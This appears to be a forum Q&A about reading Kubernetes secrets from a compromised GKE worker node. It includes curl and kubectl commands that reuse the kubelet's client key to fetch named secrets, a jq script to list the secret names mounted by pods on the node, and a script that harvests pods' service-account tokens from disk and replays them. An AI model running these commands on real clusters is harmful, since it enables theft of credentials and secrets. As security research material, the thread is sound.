Mugen

Reputation: 9095

system:node fails to get secrets from apiserver via curl

I'm doing a PoC for security research, trying to access namespace secrets directly from a worker node. I have a GKE cluster running Kubernetes 1.20.

I'm running the following command from a worker (non-master) node:

curl -v $APISERVER/api/v1/namespaces/default/pods/ \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  --cert /var/lib/kubelet/pki/kubelet-client.crt \
  --key /var/lib/kubelet/pki/kubelet-client.key

And it works fine.

However, trying to get secrets fails:

curl -v $APISERVER/api/v1/namespaces/default/secrets/ \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  --cert /var/lib/kubelet/pki/kubelet-client.crt \
  --key /var/lib/kubelet/pki/kubelet-client.key
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "secrets is forbidden: User \"system:node:gke-XXX--YYY\" cannot list resource \"secrets\" in API group \"\" in the namespace \"pencil\": No Object name found",
  "reason": "Forbidden",
  "details": {
    "kind": "secrets"
  },
  "code": 403
}
Looking at the documentation, I see that the kubelet running on a node should be able to access secrets: https://kubernetes.io/docs/reference/access-authn-authz/node/

And from my understanding, the authorization is backed by the ClusterRole system:node. Looking at it, I do see it grants permission to get secrets:

% kubectl get clusterrole system:node -o json
{
    "apiVersion": "rbac.authorization.k8s.io/v1",
    "kind": "ClusterRole",
...
        {
            "apiGroups": [
                ""
            ],
            "resources": [
                "configmaps",
                "secrets"
            ],
            "verbs": [
                "get",
                "list",
                "watch"
            ]
        },
...
    ]
}

And some more relevant documentation for communication between kubelet and kube-apiserver: https://kubernetes.io/docs/concepts/architecture/control-plane-node-communication/#node-to-control-plane

Upvotes: 0

Views: 1108

Answers (3)

Mugen

Reputation: 9095

After digging into the source code, I found the meaning of the No Object name found error: secrets or configmaps must be requested by name in order to be retrieved. As the documentation suggests, they can be retrieved only if they are mapped to the node in question by some pod.

Therefore, assuming a secret named server-password is used by some pod on my node, the following command worked as expected:

curl -v $APISERVER/api/v1/namespaces/default/secrets/server-password \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  --cert /var/lib/kubelet/pki/kubelet-client.crt \
  --key /var/lib/kubelet/pki/kubelet-client.key

Also, kubectl can apparently be used just as easily with the kubelet's kubeconfig; it's what created the certificates at /var/lib/kubelet/pki in the first place.

kubectl --kubeconfig /var/lib/kubelet/kubeconfig -n default get secret server-password -o json
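To find candidate secret names to fetch, one can list the pods bound to the node and pull the secret volumes out of their specs. A minimal sketch using jq on an already-retrieved pod list; the JSON here is a hypothetical sample, and in practice it would come from the /api/v1/pods endpoint with a fieldSelector on spec.nodeName:

```shell
# Hypothetical sample of a pod list as returned by the API server;
# in practice, fetch it with the node's credentials, e.g. with
# ?fieldSelector=spec.nodeName=gke-XXX--YYY appended to the URL.
PODS='{"items":[{"metadata":{"namespace":"default"},"spec":{"volumes":[{"secret":{"secretName":"server-password"}},{"emptyDir":{}}]}}]}'

# Emit namespace/secretName for every secret volume mounted by those pods.
echo "$PODS" | jq -r '
  .items[] as $p
  | $p.spec.volumes[]?
  | select(.secret)
  | $p.metadata.namespace + "/" + .secret.secretName'
# → default/server-password
```

Each name printed this way is one the node's credentials should be able to GET individually, per the rule above.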

Upvotes: 1

Rajesh Dutta

Reputation: 249

This is expected.

Normally, access to secrets is granted via a service account. You need to find a service account token mounted in a pod running on the node; for this you may try to dig into the "magical" /proc folder on the node. Only if you can access the service account token mounted in the pod, and that service account has permission to access secrets, can the secrets be accessed from the node.
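As a sketch of that idea: besides /proc, the kubelet also materializes mounted service account tokens under /var/lib/kubelet/pods on the node, so a bearer token can be picked up there and passed to curl. The path layout, $APISERVER, and the CA location are assumptions carried over from the question; adjust for your cluster (newer clusters mount projected tokens under kubernetes.io~projected instead):

```shell
# Find a service account token the kubelet has mounted into some pod.
# (Path layout is an assumption; verify on your node.)
TOKEN_FILE=$(find /var/lib/kubelet/pods -path '*kubernetes.io~secret*' \
  -name token 2>/dev/null | head -n 1)
TOKEN=$(cat "$TOKEN_FILE")

# Use it as a bearer token; authorization now depends on that
# service account's RBAC, not on the node identity.
curl -s "$APISERVER/api/v1/namespaces/default/secrets/" \
  --cacert /etc/srv/kubernetes/pki/ca-certificates.crt \
  -H "Authorization: Bearer $TOKEN"
```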

Upvotes: 0

confused genius

Reputation: 3284

I think the certificate locations you are giving are incorrect. I tried the same on my plain Kubernetes cluster with the following certificates and it worked fine.
curl $APISERVER/api/v1/namespaces/default/secrets \
  --cacert /etc/kubernetes/pki/ca.crt \
  --cert /etc/kubernetes/pki/apiserver-kubelet-client.crt \
  --key /etc/kubernetes/pki/apiserver-kubelet-client.key

Upvotes: 3
